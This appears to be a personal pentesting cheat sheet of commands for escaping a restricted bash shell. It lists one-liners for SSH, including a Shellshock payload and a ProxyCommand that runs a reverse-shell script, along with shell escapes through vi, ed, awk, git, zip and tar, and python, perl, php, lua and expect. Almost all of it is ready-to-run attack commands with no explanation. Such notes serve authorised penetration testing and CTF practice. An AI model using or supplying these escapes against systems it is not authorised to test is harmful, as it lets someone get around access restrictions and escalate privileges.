Rbash Escape

tags: #commands
home: Linux Privilege Escalation#Shell Escapes

SSH

ssh username@ip -t "/bin/sh" 
ssh username@ip -t "/bin/bash"
ssh username@ip -t "() {:;}; /bin/bash"   # shell shock
ssh -o ProxyCommand="sh -c /tmp/revshell.sh" 127.0.0.1 (SUID)

vi

vi
:set shell=/bin/bash
:shell

ed

cd /home
echo $SHELL
ed
!'/bin/bash'
pwd

awk

awk 'BEGIN {system("/bin/bash")}'

git

git help status
!/bin/bash

zip

zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

tar

tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash

Programming Languages

python

python -c 'import os; os.system("/bin/bash")'
python3 -c 'import os; os.system("/bin/bash")'

pearl

perl -e 'system("/bin/bash");'

php

php -a 
exec("sh -i")

expect

expect spawn sh
sh

lua

lua> os.execute("/bin/sh")

44592-linux-restricted-shell-bypass-guide.pdf